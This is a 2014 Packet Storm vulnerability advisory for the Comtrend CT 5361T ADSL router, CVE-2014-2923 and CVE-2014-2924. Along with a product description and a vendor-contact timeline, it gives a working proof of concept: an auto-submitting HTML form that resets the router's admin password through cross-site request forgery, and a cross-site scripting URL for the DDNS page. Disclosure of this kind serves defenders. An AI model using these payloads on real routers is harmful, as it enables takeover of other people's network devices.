Comtrend CT 5361T Cross Site Request Forgery / Cross Site Scripting

2014-04-21T00:00:00
ID PACKETSTORM:126251
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2014-04-21T00:00:00

Description

                                        
                                            `[+] Author: TUNISIAN CYBER  
[+] Exploit Title: Comtrend CT 5361T Multiple Vulnerabilities  
[+] Date: 21-04-2014  
[+] Category: WebApp  
[+] CVE:CVE-2014-2923  
CVE-2014-2924  
[+] Tested on: Windows 7 Pro  
[+] Vendor: http://www.comtrend.com/  
[+] Product: http://www.comtrend.com/cgi-bin/na/db-searchn.cgi?template=proview1.htm&dbname=product&key2=32&action=searchdbdisplay  
[+] Friendly Sites: na3il.com,th3-creative.com  
  
1.OVERVIEW:  
WiFi router Comtrend CT 5361T suffers from a Cross Site Request Forgery (change passwd) and Cross-Site Scripting Vulnerability  
  
2.Version:  
CT 5361T (more likely CT CT 536X)  
Software Version: A111-312SSG-T02_R01  
Wireless Driver Version: 4.150.10.15.cpe2.2  
  
3.Background:  
The CT-5361T is an 802.11g (54Mbps) Wireless and Wired ADSL2+ router.   
Four 10/100 Base-T Ethernet ports and an optional USB port and an integrated 802.11g WiFi WLAN Access Point (AP) provide with wired LAN connectivity and wireless connectivity separately.  
The CT-5361T ADSL2+ router also provides for state of the art security features such as WPA data encryption,   
Firewall and VPN pass through.   
The CT-5361T is designed for both residential and business applications that require wireless and wired connectivity to an ADSL broadband network.  
The CT-5361T supports up to 16 contiguous virtual connections allowing for multiple simultaneous Internet connections.   
The CT-5361T is also designed with TR-068 compliant color panel and LED indicators, which eases the installation of the modem and makes it more user-friendly.  
  
  
4.Proof Of Concept:  
CSRF  
<html>  
<body onload="javascript:document.forms[0].submit()">  
<form method="POST" name="form0" action="192.168.1.1/password.cgi?sysPassword=[Your Password]">  
</form>  
</body>  
</html>  
Then Login as root with your new pwd.  
  
XSS:  
192.168.1.1/ddnsmngr.cmd?action=add&service=1&hostname=blabla&username=%3cscript%3ealert(%27xss%27)%3c%2fscript%3e&password=bblala&iface=ppp0  
http://i.imgur.com/plXXpJU.png  
5.Solution(s):  
NOT FIXED  
  
6.TIME-LINE:  
16-04-2014: Vulnerability was discovered.  
16-04-2014: Contact with vendor and ISP.  
17-04-2014: No Reply.  
18-04-2014: No Reply.  
18-04-2014: ANOTHER contact with vendor and ISP.  
19-04-2014: No Reply.  
20-04-2014: No Reply.  
20-04-2014: CVE(s) Requested.  
21-04-2014: CVE assigned.  
21-04-2014: Vulnerability published.  
  
  
  
  
  
  
7.Greetings:  
Xmax-tn  
Xtech-set  
N43il  
Sec4ver,E4A Members  
`